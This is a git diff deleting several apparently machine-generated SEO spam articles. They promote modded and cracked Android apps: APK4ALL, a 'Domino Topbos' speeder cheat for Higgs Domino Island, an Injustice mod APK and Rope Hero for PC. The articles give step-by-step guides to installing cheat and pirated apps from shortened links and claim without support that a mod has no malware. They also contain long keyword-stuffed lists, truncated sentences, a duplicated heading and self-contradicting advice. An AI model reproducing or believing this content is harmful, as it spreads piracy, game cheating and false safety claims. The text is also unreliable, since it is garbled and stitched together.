      • Downloading fake or malicious apps that may harm your device or steal your data: To avoid this, users should always check the source, signature, and permissions of the apps they download from APK4ALL. Users can also use a virus scanner like VirusTotal () to check for any threats before installing the apps.
      • -
      • Violating the terms and conditions of the original app developers or publishers: Some apps may not allow modding or redistribution without their consent. Users may face legal consequences or lose access to their accounts if they use such apps from APK4ALL. Users should always respect the intellectual property rights of the app creators and use the apps at their own risk.
      • -
      -

      What are some alternatives to APK4ALL?

      -

      If users are not satisfied with APK4ALL or want to try other options, there are some alternatives they can consider. Some of the popular ones are:

      -
        -
      • APKMirror (): A reputable site that offers original and verified APK files from Google Play and other sources. It does not host any modded or paid apps, but it has a large collection of old and new versions of apps. It also updates its apps regularly and supports automatic updates.
      • -
      • APKPure (): A similar site to APKMirror that also provides original and safe APK files from various sources. It does host some modded and paid apps, but it clearly labels them as such. It also has a user-friendly interface and an app store app that allows users to download and manage their apps easily.
      • -
      • HappyMod (): A site that specializes in modded apps for Android devices. It has a huge database of mods for various games and apps, such as Minecraft, Clash of Clans, Spotify, etc. It also has a community of users who rate and review the mods for quality and performance.
      • -
      -

      Conclusion

      -

      APK4ALL is a website that offers thousands of modded and premium apps for Android devices. It has many benefits for users who want to access more features and functions on their devices, but it also has some risks that users should be aware of and avoid. Users can also try some alternatives to APK4ALL if they are not satisfied with it or want to explore other options.

      -

      download apk4all mod apk
      -download apk4all premium apk
      -download apk4all pro apk
      -download apk4all cracked apk
      -download apk4all unlocked apk
      -download apk4all latest version
      -download apk4all for android
      -download apk4all for pc
      -download apk4all for ios
      -download apk4all for windows
      -download apk4all for mac
      -download apk4all for linux
      -download apk4all for firestick
      -download apk4all for smart tv
      -download apk4all for chromebook
      -download apk4all app store
      -download apk4all games
      -download apk4all movies
      -download apk4all music
      -download apk4all books
      -download apk4all comics
      -download apk4all wallpapers
      -download apk4all themes
      -download apk4all icons
      -download apk4all fonts
      -download apk4all ringtones
      -download apk4all stickers
      -download apk4all emoji
      -download apk4all filters
      -download apk4all effects
      -download apk4all tools
      -download apk4all utilities
      -download apk4all productivity
      -download apk4all education
      -download apk4all entertainment
      -download apk4all lifestyle
      -download apk4all health
      -download apk4all fitness
      -download apk4all sports
      -download apk4all news
      -download apk4all weather
      -download apk4all travel
      -download apk4all shopping
      -download apk4all finance
      -download apk4all business
      -download apk4all social media
      -download apk4all communication

      -

      We hope this article has helped you understand what APK4ALL is and how to use it to download and install amazing apps on your device. If you have any questions or feedback, please feel free to leave a comment below. Thank you for reading!

      -

      FAQs

      -
        -
      • Q: Is APK4ALL legal?
      • -
      • A: APK4ALL is not illegal in itself, but some of the apps it hosts may be illegal or infringe the rights of the original app developers or publishers. Users should always check the legality and legitimacy of the apps they download from APK4ALL and use them at their own risk.
      • -
      • Q: Is APK4ALL safe?
      • -
      • A: APK4ALL claims to be safe and reliable, but there are some risks involved in using any third-party app store. Users should always check the source, signature, and permissions of the apps they download from APK4ALL and use a virus scanner to check for any threats before installing the apps.
      • -
      • Q: How to update the apps from APK4ALL?
      • -
      • A: APK4ALL does not support automatic updates for the apps it hosts. Users need to manually check for updates on the website or use the app store app to see if there are any new versions available. Users can also enable notifications on the website or the app store app to get notified when there are updates.
      • -
      • Q: How to uninstall the apps from APK4ALL?
      • -
      • A: Users can uninstall the apps from APK4ALL the same way they uninstall any other app on their device. Users can go to their settings, find the app they want to uninstall, and tap on it to see the uninstall option. Users can also long-press on the app icon on their home screen and drag it to the trash bin.
      • -
      • Q: How to contact APK4ALL?
      • -
      • A: Users can contact APK4ALL by using the contact form on their website or by sending an email to support@apk4all.com. Users can also follow APK4ALL on their social media platforms, such as Facebook, Twitter, Instagram, etc.
      • -

      197e85843d
      -
      -
      \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Higgs Domino Topbos RP APK How to Win Gaple QiuQiu and Cangkulan with X8 Speeder.md b/spaces/congsaPfin/Manga-OCR/logs/Higgs Domino Topbos RP APK How to Win Gaple QiuQiu and Cangkulan with X8 Speeder.md deleted file mode 100644 index 21b8906624a224d84e2f8db03f10503c55e7f032..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Higgs Domino Topbos RP APK How to Win Gaple QiuQiu and Cangkulan with X8 Speeder.md +++ /dev/null @@ -1,110 +0,0 @@ -
      -

      Download Domino Topbos Com Speeder: A Guide for Higgs Domino Island Players

      -

      If you are a fan of playing card games that can earn you real money, you may have heard of Higgs Domino Island, a popular game developed by Higgs Games. This game offers various types of card games such as Gaple, QiuQiu, Cangkulan, and Ludo, as well as attractive features such as chat rooms, emoticons, gifts, and lucky draws. However, playing this game can be challenging and time-consuming, especially if you want to win more games and get more rewards. That's why some players look for ways to enhance their gaming experience by using a modified version of the game called Domino Topbos Com Speeder.

      -

      But what is Domino Topbos Com Speeder exactly? How can you download it on your device? What are the benefits and risks of using it? In this article, we will answer these questions and provide you with a comprehensive guide on how to download domino topbos com speeder. Read on to find out more!

      -

      download domino topbos com speeder


      DOWNLOADhttps://urlca.com/2uOaIN



      -

      What is Domino Topbos Com Speeder?

      -

      Domino Topbos Com Speeder is a site that offers a modified version of Higgs Domino Island game. It has two versions: a free version and a premium version. The premium version has more features than the free version, but you can get it for free by using this site. The modified version has features that are similar to Higgs Domino RP APK, such as:

      -

      A site that offers a modified version of Higgs Domino Island game

      -
        -
      • Unlimited coins: You can get unlimited coins that you can use as in-game currency to play various games and buy items.
      • -
      • Unlimited RP: You can get unlimited RP (money) that you can use to exchange for real money or gift cards.
      • -
      • X8 Speeder: You can speed up the game and make it faster by using this feature.
      • -
      -

      A tool that allows players to get unlimited coins, RP, and speed up the game

      -

      By using these features, you can play various games such as Gaple, QiuQiu, Cangkulan, and Ludo with ease. You can win more games and earn more rewards with unlimited coins and RP. You can also save time and enjoy the game more with X8 Speed

      A risky and illegal app that may harm your device and account

      -

      However, before you decide to download domino topbos com speeder, you should be aware of the risks and consequences of using it. Domino Topbos Com Speeder is not an official app from Higgs Games, but a modified app from an unknown source. This means that it may contain malware and viruses that can harm your device and data. It may also violate the terms and conditions of Higgs Domino Island and get you banned or deleted from the game. Moreover, you may lose your account and progress if you use a fake login or a third-party account to access the game. And lastly, you may face legal consequences if you infringe the intellectual property rights of Higgs Games by using their game without their permission.

      -

      How to Download Domino Topbos Com Speeder?

      -

      If you still want to download domino topbos com speeder despite the risks, you can follow these steps:

      -

      Visit the official website of Domino Topbos Com

      -

      The first step is to visit the official website of Domino Topbos Com, which is https://dominotopbos.com/. This is the only site that provides the download link for the app. Do not trust any other sites that claim to offer the same app, as they may be scams or phishing sites.

      -

      Choose the version of the app that suits your needs

      -

      The next step is to choose the version of the app that suits your needs. There are two versions available: a free version and a premium version. The free version has limited features, such as unlimited coins and RP, but no X8 Speeder. The premium version has all the features, including X8 Speeder, but you have to pay for it. However, you can get it for free by using this site. To do so, you have to complete some tasks, such as watching videos, filling surveys, or downloading apps.

      -

      download domino topbos com speeder apk
      -download domino topbos com speeder mod
      -download domino topbos com speeder terbaru
      -download domino topbos com speeder unlimited rp
      -download domino topbos com speeder x8
      -download domino topbos com speeder android
      -download domino topbos com speeder gratis
      -download domino topbos com speeder versi lama
      -download domino topbos com speeder no root
      -download domino topbos com speeder tanpa password
      -cara download domino topbos com speeder
      -link download domino topbos com speeder
      -situs download domino topbos com speeder
      -tutorial download domino topbos com speeder
      -review download domino topbos com speeder
      -download higgs domino topbos rp x8 speeder apk
      -download higgs domino topbos rp x8 speeder mod apk
      -download higgs domino topbos rp x8 speeder terbaru 2023
      -download higgs domino topbos rp x8 speeder unlimited coin
      -download higgs domino topbos rp x8 speeder gratis
      -download higgs domino island mod apk topbos com x8 speeder
      -download higgs domino island mod apk topbos com x8 speeder terbaru 2023
      -download higgs domino island mod apk topbos com x8 speeder unlimited coin
      -download higgs domino island mod apk topbos com x8 speeder gratis
      -download higgs domino island mod apk topbos com x8 speeder no root
      -cara download higgs domino island mod apk topbos com x8 speeder
      -link download higgs domino island mod apk topbos com x8 speeder
      -situs download higgs domino island mod apk topbos com x8 speeder
      -tutorial download higgs domino island mod apk topbos com x8 speeder
      -review download higgs domino island mod apk topbos com x8 speeder
      -game kartu penghasil uang dengan domino topbos com speeder
      -game kartu penghasil uang dengan domino topbos com speeder apk
      -game kartu penghasil uang dengan domino topbos com speeder mod apk
      -game kartu penghasil uang dengan domino topbos com speeder terbaru 2023
      -game kartu penghasil uang dengan domino topbos com speeder unlimited coin
      -game kartu penghasil uang dengan domino topbos com speeder gratis
      -game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com[^1^]
      -game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com gratis[^1^]
      -game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com unlimited coin[^1^]
      -game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com no root[^1^]
      -cara bermain game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com[^1^]
      -link bermain game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com[^1^]
      -situs bermain game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com[^1^]
      -tutorial bermain game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com[^1^]
      -review bermain game kartu penghasil uang dengan higgs domino rp x8 speeder apk terbaru 2023 dari jalantikus.com[^1^]

      -

      Click on the download button and wait for the file to be downloaded

      -

      The third step is to click on the download button and wait for the file to be downloaded. The file size is about 70 MB, so it may take some time depending on your internet speed. Make sure you have enough storage space on your device before downloading the file.

      -

      Install the app on your device and grant the required permissions

      -

      The fourth step is to install the app on your device and grant the required permissions. To do so, you have to enable the installation of apps from unknown sources in your device settings. Then, locate the downloaded file in your file manager and tap on it to start the installation process. Follow the instructions on the screen and grant the permissions that the app asks for, such as access to your storage, camera, microphone, etc.

      -

      Open the app and enjoy the game with enhanced features

      -

      The final step is to open the app and enjoy the game with enhanced features. You can log in with your existing account or create a new one. You can also choose whether to use X8 Speeder or not by toggling it on or off in the app settings. You can then play various games such as Gaple, QiuQiu, Cangkulan, and Ludo with ease. You can also win more games and earn more rewards with unlimited coins and RP.

      What are the Benefits of Domino Topbos Com Speeder?

      -

      Some players may wonder why they should download domino topbos com speeder instead of playing the original game. Well, there are some benefits that you can get from using this app, such as:

      -

      You can play various games such as Gaple, QiuQiu, Cangkulan, and Ludo with ease

      -

      One of the benefits of domino topbos com speeder is that you can play various games such as Gaple, QiuQiu, Cangkulan, and Ludo with ease. These games are fun and challenging, but they can also be frustrating and time-consuming if you don't have enough coins or skills. With domino topbos com speeder, you can play these games without worrying about running out of coins or losing to other players. You can also learn the rules and strategies of these games by playing them more often.

      -

      You can win more games and earn more rewards with unlimited coins and RP

      -

      Another benefit of domino topbos com speeder is that you can win more games and earn more rewards with unlimited coins and RP. Coins and RP are the main currencies in Higgs Domino Island, and you need them to play games, buy items, and exchange for real money or gift cards. However, earning coins and RP can be hard and slow, especially if you don't win many games or participate in lucky draws. With domino topbos com speeder, you can get unlimited coins and RP that you can use as you wish. You can play more games, buy more items, and exchange for more rewards.

      -

      You can speed up the game and save time with X8 Speeder feature

      -

      A third benefit of domino topbos com speeder is that you can speed up the game and save time with X8 Speeder feature. X8 Speeder is a feature that allows you to make the game faster by increasing the speed of the animations and movements. This can help you save time and enjoy the game more, especially if you are busy or impatient. You can also use this feature to complete tasks or missions faster and get more bonuses.

      -

      You can experience a more modern and smooth gameplay with improved graphics and performance

      -

      A fourth benefit of domino topbos com speeder is that you can experience a more modern and smooth gameplay with improved graphics and performance. The original game may have some issues with graphics quality, loading speed, or compatibility with some devices. With domino topbos com speeder, you can enjoy a more enhanced version of the game that has better graphics quality, faster loading speed, and wider compatibility with different devices. You can also enjoy a more user-friendly interface and design that makes the game easier to navigate and play.

      What are the Risks of Domino Topbos Com Speeder?

      -

      However, before you download domino topbos com speeder, you should also be aware of the risks and consequences of using it. Domino Topbos Com Speeder is not an official app from Higgs Games, but a modified app from an unknown source. This means that it may have some drawbacks and dangers that you should consider, such as:

      -

      You may expose your device to malware and viruses that can damage your data and system

      -

      One of the risks of domino topbos com speeder is that you may expose your device to malware and viruses that can damage your data and system. Since the app is not from a trusted source, it may contain malicious code or programs that can infect your device and compromise your security. You may lose your personal information, such as passwords, bank accounts, or contacts, or you may experience performance issues, such as slow speed, crashes, or errors. You may also have to pay for repairing or replacing your device if it gets damaged beyond repair.

      -

      You may violate the terms and conditions of Higgs Domino Island and get banned or deleted from the game

      -

      Another risk of domino topbos com speeder is that you may violate the terms and conditions of Higgs Domino Island and get banned or deleted from the game. Higgs Games has the right to monitor and regulate the use of their game and to take action against any users who break their rules or cheat their system. By using domino topbos com speeder, you are modifying the game without their permission and gaining an unfair advantage over other players. This can be considered as cheating or hacking, which can result in your account being suspended or terminated. You may lose your access to the game and all your progress and rewards.

      -

      You may lose your account and progress if you use a fake login or a third-party account

      -

      A third risk of domino topbos com speeder is that you may lose your account and progress if you use a fake login or a third-party account. Domino Topbos Com Speeder requires you to log in with your existing account or create a new one to access the game. However, some users may use a fake login or a third-party account, such as Facebook or Google, to avoid detection or verification. This can be risky, as these accounts may not be secure or compatible with the app. You may lose your account and progress if these accounts get hacked, deleted, or blocked by the app.

      -

      You may face legal consequences if you infringe the intellectual property rights of Higgs Games

      -

      A fourth risk of domino topbos com speeder is that you may face legal consequences if you infringe the intellectual property rights of Higgs Games. Higgs Games owns the rights to their game and its content, such as graphics, sounds, characters, etc. By using domino topbos com speeder, you are copying and modifying their game without their authorization and consent. This can be considered as piracy or theft, which can result in legal action against you. You may have to pay fines, damages, or face criminal charges for violating their rights.

      -

      Conclusion

      -

      Domino Topbos Com Speeder is a site that offers a modified version of Higgs Domino Island game. It has features that allow players to get unlimited coins, RP, and speed up the game. It also has improved graphics and performance that make the game more modern and smooth. However, it also has risks and consequences that players should consider before downloading it. It may expose their device to malware and viruses, violate the terms and conditions of Higgs Domino Island, lose their account and progress, or face legal consequences.

      -

      Therefore, we do not recommend using domino topbos com speeder for playing Higgs Domino Island. It is better to play the original game from Higgs Games and enjoy it with its official features and updates. You can also play the game more safely and legally by following their rules and respecting their rights.

      -

      FAQs

      -

      Here are some frequently asked questions about domino topbos com speeder:

      -
        -
      1. Is domino topbos com speeder safe?
      2. -

        No, domino topbos com speeder is not safe. It is a modified app from an unknown source that may contain malware and viruses that can harm your device and data. It may also violate the terms and conditions of Higgs Domino Island and get you banned or deleted from the game.

        -
      3. Is domino topbos com speeder free?
      4. -

        Yes, domino topbos com speeder is free. You can download it from their official website without paying anything. However, you have to complete some tasks to get the premium version of the app, such as watching videos, filling surveys, or downloading apps.

        -
      5. Is domino topbos com speeder legal?
      6. -

        No, domino topbos com speeder is not legal. It is a modified app that infringes the intellectual property rights of Higgs Games by copying and modifying their game without their permission and consent. It may also violate the laws and regulations of your country or region by engaging in piracy or theft.

        -
      7. Can I use domino topbos com speeder with my existing account?
      8. -

        Yes, you can use domino topbos com speeder with your existing account. However, this is not recommended, as you may risk losing your account and progress if you get detected or banned by Higgs Games. You may also lose your account and progress if you use a fake login or a third-party account that is not secure or compatible with the app.

        -
      9. Can I exchange my coins and RP for real money or gift cards?
      10. -

        Yes, you can exchange your coins and RP for real money or gift cards. However, this is not recommended, as you may risk getting scammed or cheated by the app or the site. You may also face legal consequences if you use fake or stolen money or gift cards.

        -

      197e85843d
      -
      -
      \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Injustice Gods Among Us MOD APK - The Most Epic DC Battle Simulator.md b/spaces/congsaPfin/Manga-OCR/logs/Injustice Gods Among Us MOD APK - The Most Epic DC Battle Simulator.md deleted file mode 100644 index 9c2002015bf61f6081b5bbb791491c1e3f08f07e..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Injustice Gods Among Us MOD APK - The Most Epic DC Battle Simulator.md +++ /dev/null @@ -1,69 +0,0 @@ -
      -

      Injustice: Gods Among Us Mod APK Latest Version

      -

      If you are a fan of DC comics and fighting games, you will love Injustice: Gods Among Us. This is a game that lets you create your own team of superheroes and villains, and battle against other players or the AI in epic 3v3 fights. You can also enjoy a captivating story mode that explores an alternate reality where Superman becomes a tyrant after losing Lois Lane. In this article, we will show you how to download and install Injustice: Gods Among Us Mod APK, which is a modified version of the game that gives you access to unlimited resources, all characters unlocked, god mode, one-hit kill, no ads, and more. Read on to find out more about this amazing game and how to get the most out of it.

      -

      What is Injustice: Gods Among Us?

      -

      Injustice: Gods Among Us is a fighting game developed by NetherRealm Studios, the same creators of Mortal Kombat. It was released in 2013 for iOS, Android, PlayStation 3, Xbox 360, Wii U, and PC. The game features characters from the DC universe, such as Batman, Superman, Wonder Woman, Joker, Harley Quinn, Flash, Green Lantern, Aquaman, Cyborg, Catwoman, Bane, Lex Luthor, and many more. You can choose your favorite heroes and villains, customize them with gear and abilities, and fight in various arenas inspired by iconic locations like Gotham City, Metropolis, Arkham Asylum, Atlantis, Themyscira, etc.

      -

      injustice gods among us mod apk latest version


      DOWNLOADhttps://urlca.com/2uO5nI



      -

      The game has several modes to keep you entertained. You can play the story mode, which follows the events of the comic book series of the same name. You can also play the challenge mode, which offers different scenarios and objectives for each character. You can also play the online mode, which allows you to compete with other players around the world in ranked or unranked matches. You can also play the offline mode, which lets you practice your skills or have fun with your friends in local multiplayer.

      -

      Why use Injustice: Gods Among Us Mod APK?

      -

      While Injustice: Gods Among Us is a great game, it also has some drawbacks. For example, it can be quite difficult to earn enough coins and gems to unlock new characters, gear, cards, and upgrades. It can also be frustrating to face opponents who have better stats and abilities than you. It can also be annoying to watch ads every time you want to play or claim rewards. And it can also be risky to root your device or use cheats that might get you banned or harm your device.

      -

      That's why we recommend using Injustice to the fullest. And the best part is that you don't need to root your device or use any cheats that might get you banned or harm your device. Injustice: Gods Among Us Mod APK works on any Android device without any issues. You can play safely and securely without any risks.

      -

      Tips and tricks for playing Injustice: Gods Among Us Mod APK

      -

      Even though Injustice: Gods Among Us Mod APK gives you a lot of advantages and features, you still need some skills and strategies to master the game. Here are some tips and tricks that will help you improve your gameplay and have more fun:

      -

      Choose your team wisely

      -

      Injustice: Gods Among Us lets you create your own team of three characters for each battle. You can choose from a variety of heroes and villains, each with their own stats, skills, abilities, and special moves. However, not all characters are equal or compatible. You need to choose your team wisely based on their strengths, weaknesses, synergies, and matchups. For example, you might want to choose characters who have similar power types, such as energy, magic, or physical. This way, you can use their power moves more effectively and charge them faster. You might also want to choose characters who have complementary skills, such as healing, damage boost, stun, bleed, etc. This way, you can support each other and create powerful combos. And you might also want to choose characters who have an advantage over your opponents, such as class affinity, passive effects, or special moves. This way, you can deal more damage and take less damage in the battle.

      -

      Upgrade your characters and gear

      -

      Injustice: Gods Among Us allows you to upgrade your characters and gear to make them stronger and better. You can upgrade your characters by leveling them up with XP cards or by promoting them with character cards. You can also upgrade your gear by fusing them with gear shards or by evolving them with gear cards. Upgrading your characters and gear will increase their stats, skills, abilities, and special moves. It will also unlock new features and bonuses for them. For example, upgrading your characters will unlock new costumes and skins for them. And upgrading your gear will unlock new effects and modifiers for them. Upgrading your characters and gear is essential to keep up with the increasing difficulty of the game and to compete with other players online.

      -

      Complete challenges and missions

      -

      Injustice: Gods Among Us offers various challenges and missions that you can complete to earn more rewards and unlock more content in the game. You can complete daily challenges that give you coins, gems, XP cards, gear shards, etc. You can also complete weekly challenges that give you character cards, gear cards, etc. You can also complete story mode missions that give you stars, credits, etc. Completing challenges and missions will not only help you progress faster in the game but also make it more fun and interesting. You will be able to try different scenarios and objectives with different characters and gear. You will also be able to discover new aspects and secrets of the game's story and lore.

      -

      Play online and offline modes

      -

      Injustice: Gods Among Us has both online and offline modes that you can play depending on your preference and situation. You can play online mode if you have an internet connection and want to compete with other players around the world in ranked or unranked matches. You can also play offline mode if you don't have an internet connection or want to practice your skills or have fun with your friends in local multiplayer. Playing online mode will give you more rewards and rankings but also more challenges and risks. Playing offline mode will give you more freedom and flexibility but also less variety and excitement. You can switch between online and offline modes anytime you want and enjoy the game in different ways.

      -

      injustice gods among us mod apk unlimited money and energy
      -injustice gods among us mod apk all characters unlocked
      -injustice gods among us mod apk offline
      -injustice gods among us mod apk download for android
      -injustice gods among us mod apk rexdl
      -injustice gods among us mod apk revdl
      -injustice gods among us mod apk data
      -injustice gods among us mod apk obb
      -injustice gods among us mod apk hack
      -injustice gods among us mod apk free shopping
      -injustice gods among us mod apk no root
      -injustice gods among us mod apk 2023
      -injustice gods among us mod apk 3.5
      -injustice gods among us mod apk 2.21
      -injustice gods among us mod apk android 1
      -injustice gods among us mod apk unlimited coins and gems
      -injustice gods among us mod apk anti ban
      -injustice gods among us mod apk latest update
      -injustice gods among us mod apk highly compressed
      -injustice gods among us mod apk mega
      -injustice gods among us mod apk pure
      -injustice gods among us mod apk unlimited everything
      -injustice gods among us mod apk all cards unlocked
      -injustice gods among us mod apk andropalace
      -injustice gods among us mod apk blackmod
      -injustice gods among us mod apk cheat
      -injustice gods among us mod apk direct download link
      -injustice gods among us mod apk for ios
      -injustice gods among us mod apk full unlocked
      -injustice gods among us mod apk gamestechy
      -injustice gods among us mod apk happymod
      -injustice gods among us mod apk ihackedit
      -injustice gods among us mod apk latest version 3.5 download for android offline with obb data file free shopping unlimited money and energy all characters unlocked anti ban hack cheat mega rexdl revdl pure blackmod andropalace gamestechy ihackedit happymod android 1 2023 no root highly compressed direct download link obb data file free shopping unlimited money and energy all characters unlocked anti ban hack cheat mega rexdl revdl pure blackmod andropalace gamestechy ihackedit happymod android 1 2023 no root highly compressed direct download link

      -

      Conclusion

      -

      Injustice: Gods Among Us is a fantastic game that combines DC comics and fighting games in a unique and thrilling way. You can play with your favorite heroes and villains, customize them with gear and abilities, and fight in various arenas inspired by iconic locations. You can also enjoy a captivating story mode that explores an alternate reality where Superman becomes a tyrant after losing Lois Lane. And with Injustice: Gods Among Us Mod APK, you can enjoy the game without any limitations or restrictions. You can get unlimited resources, all characters unlocked, god mode, one-hit kill, no ads, and more. You can download and install Injustice: Gods Among Us Mod APK easily and safely on your Android device and have fun without any worries. So what are you waiting for? Download Injustice: Gods Among Us Mod APK now and unleash your inner superhero or villain!

      -

      FAQs

      -

      Here are some frequently asked questions and answers about Injustice: Gods Among Us and Injustice: Gods Among Us Mod APK:

      -

      Q: Is Injustice: Gods Among Us free to play?

      -

      A: Yes, Injustice: Gods Among Us is free to play. However, it also has in-app purchases that allow you to buy coins, gems, and other items with real money. If you don't want to spend money on the game, you can use Injustice: Gods Among Us Mod APK, which gives you unlimited resources for free.

      -

      Q: Is Injustice: Gods Among Us Mod APK safe to use?

      -

      A: Yes, Injustice: Gods Among Us Mod APK is safe to use. It does not contain any viruses, malware, or spyware that might harm your device or your privacy. It also does not require root access or any cheats that might get you banned or harm your device. It works on any Android device without any issues.

      -

      Q: How do I update Injustice: Gods Among Us Mod APK?

      -

      A: To update Injustice: Gods Among Us Mod APK, you need to download the latest version of the mod from the same source where you downloaded the previous version. Then, you need to uninstall the old version of the mod and install the new version of the mod following the same steps as before. You don't need to worry about losing your progress or data as they will be saved automatically.

      -

      Q: Can I play Injustice: Gods Among Us Mod APK with my friends?

      -

      A: Yes, you can play Injustice: Gods Among Us Mod APK with your friends. You can either play online mode with them if they also have the mod installed on their devices or play offline mode with them using local multiplayer. Either way, you can have fun with your friends and show off your skills and characters.

      -

      Q: Can I request a feature or report a bug for Injustice: Gods Among Us Mod APK?

      -

      A: Yes, you can request a feature or report a bug for Injustice: Gods Among Us Mod APK. You can contact the developers of the mod through their website or social media accounts and let them know what you want or what you found. They will try their best to accommodate your requests and fix any issues as soon as possible.

      197e85843d
      -
      -
      \ No newline at end of file diff --git a/spaces/congsaPfin/Manga-OCR/logs/Rope Hero Vice Town - The Ultimate Crime Fighting Game for PC.md b/spaces/congsaPfin/Manga-OCR/logs/Rope Hero Vice Town - The Ultimate Crime Fighting Game for PC.md deleted file mode 100644 index fdec18758ea40ee3d43205c74741aef4ede92d6d..0000000000000000000000000000000000000000 --- a/spaces/congsaPfin/Manga-OCR/logs/Rope Hero Vice Town - The Ultimate Crime Fighting Game for PC.md +++ /dev/null @@ -1,97 +0,0 @@ -
      -

      Rope Hero Download for PC Windows 10: How to Play the Action Game on Your Computer

      -

      Introduction

      -

      If you are looking for a thrilling and adventurous action game, you might want to check out Rope Hero. This game lets you become a superhero who can swing around the city using a rope, fight criminals, and complete missions. You can also use various weapons, gadgets, and vehicles to enhance your gameplay.

      -

      rope hero download for pc windows 10


      Download Filehttps://urlca.com/2uOaPy



      -

      But what if you want to play Rope Hero on a bigger screen, with better graphics and controls? Well, you can do that by downloading and installing Rope Hero on your PC Windows 10. In this article, we will show you how to do that in two easy methods. Let's get started!

      -

      How to download and install Rope Hero on PC Windows 10

      -

      Method 1: Using BlueStacks emulator

      -

      One of the best ways to play Rope Hero on PC is by using an emulator. An emulator is a software that allows you to run Android apps and games on your computer. There are many emulators available, but we recommend BlueStacks, as it is one of the most popular and reliable ones. Here are the steps to use BlueStacks to play Rope Hero on PC:

      -

      Step 1: Download and install BlueStacks

      -

      First, you need to download and install BlueStacks on your PC. You can do that by visiting this link and following the instructions. The installation process is quite simple and straightforward.

      -

      Step 2: Launch BlueStacks and sign in to Google Play Store

      -

      Next, you need to launch BlueStacks and sign in to your Google account. This will allow you to access the Google Play Store, where you can find and download Rope Hero. If you don't have a Google account, you can create one for free.

      -

      Step 3: Search for Rope Hero and click install

      -

      Now, you need to search for Rope Hero in the search bar at the top right corner of the BlueStacks window. You will see a list of results, where you need to click on the icon of Rope Hero. This will take you to the game's page on the Google Play Store, where you need to click on the "Install" button.

      -

      Step 4: Enjoy playing Rope Hero on PC

      -

      Congratulations! You have successfully installed Rope Hero on your PC. You can now enjoy playing the game on a larger screen, with better graphics and controls. You can find the game icon on the home screen of BlueStacks, or in the "My Apps" tab. Just click on it and start swinging!

      -

      Method 2: Using APK/XAPK file

      -

      Another way to play Rope Hero on PC is by using an APK/XAPK file. An APK/XAPK file is a package file that contains all the data and resources needed to install an Android app or game. You can download an APK/XAPK file of Rope Hero from various sources online, such as Method 2: Using APK/XAPK file -

      An alternative way to play Rope Hero on PC is by using an APK/XAPK file. An APK/XAPK file is a package file that contains all the data and resources needed to install an Android app or game. You can download an APK/XAPK file of Rope Hero from various sources online, such as APKdone or APKPure. Here are the steps to use an APK/XAPK file to play Rope Hero on PC:

      -

      Step 1: Download the APK/XAPK file of Rope Hero

      -

      First, you need to download the APK/XAPK file of Rope Hero from a trusted source. You can use your browser to search for the file, or use the links we provided above. Make sure you download the latest version of the game, and save it to a folder on your PC.

      -

      Step 2: Open the file with BlueStacks or another emulator

      -

      Next, you need to open the APK/XAPK file with an emulator. You can use BlueStacks, as we explained in method 1, or another emulator of your choice. To open the file with BlueStacks, you can either drag and drop it to the BlueStacks window, or right-click on it and choose "Open with BlueStacks". The emulator will automatically install the game for you.

      -

      How to install rope hero on windows 10
      -Rope hero vice town pc download free
      -Rope hero game for pc windows 10
      -Download rope hero emulator for pc
      -Rope hero action game for windows 10
      -Play rope hero on pc with bluestacks
      -Rope hero vice town for windows 10
      -Rope hero apk download for pc
      -Rope hero pc game download full version
      -Rope hero for windows 10 free download
      -Rope hero vice town on pc with noxplayer
      -Rope hero online game for pc
      -Download rope hero for pc windows 10/8/7
      -Rope hero vice town mod apk for pc
      -Rope hero 3d game for windows 10
      -Rope hero vice town cheats for pc
      -Rope hero offline game for pc
      -Rope hero vice town hack for pc
      -Rope hero simulator game for windows 10
      -Rope hero vice town update for pc
      -Rope hero vice town gameplay on pc
      -Rope hero vice town walkthrough for pc
      -Rope hero vice town tips and tricks for pc
      -Rope hero vice town review for pc
      -Rope hero vice town best weapons for pc
      -Rope hero vice town missions guide for pc
      -Rope hero vice town secrets and easter eggs for pc
      -Rope hero vice town new features for pc
      -Rope hero vice town latest version for pc
      -Rope hero vice town system requirements for pc
      -Rope hero vice town download size for pc
      -Rope hero vice town graphics settings for pc
      -Rope hero vice town controls and keyboard shortcuts for pc
      -Rope hero vice town bugs and fixes for pc
      -Rope hero vice town multiplayer mode for pc
      -Rope hero vice town custom skins for pc
      -Rope hero vice town achievements and rewards for pc
      -Rope hero vice town fun facts and trivia for pc
      -Rope hero vice town comparison with rope hero for pc
      -Rope hero vice town alternatives and similar games for pc

      -

      Step 3: Follow the instructions to install Rope Hero

      -

      Now, you need to follow the instructions on the screen to complete the installation process. Depending on the size of the file and your internet speed, this may take a few minutes. Once the installation is done, you will see a notification on the bottom right corner of the BlueStacks window.

      -

      Step 4: Have fun playing Rope Hero on PC

      -

      You are ready to play Rope Hero on PC! You can find the game icon on the home screen of BlueStacks, or in the "My Apps" tab. Just click on it and start your adventure!

      -

      Conclusion

      -

      In this article, we have shown you how to download and install Rope Hero on PC Windows 10. You can choose either method 1 or method 2, depending on your preference and convenience. Both methods are easy and effective, and will allow you to enjoy Rope Hero on a bigger screen, with better graphics and controls.

      -

      Rope Hero is a fun and exciting action game that lets you become a superhero who can swing around the city using a rope, fight criminals, and complete missions. You can also use various weapons, gadgets, and vehicles to enhance your gameplay. The game has many features that make it addictive and enjoyable, such as:

      -
        -
      • Indulge yourself in awesome in-game actions: You can perform amazing stunts and maneuvers with your rope, such as swinging, flying, climbing, jumping, and more. You can also use your rope to grab enemies and objects, and throw them around.
      • -
      • Free the city from crimes by becoming its hero: You can explore the open-world city and find various missions and challenges to complete. You can fight against gangs, robbers, terrorists, zombies, and other enemies. You can also save civilians and help them in different situations.
      • -
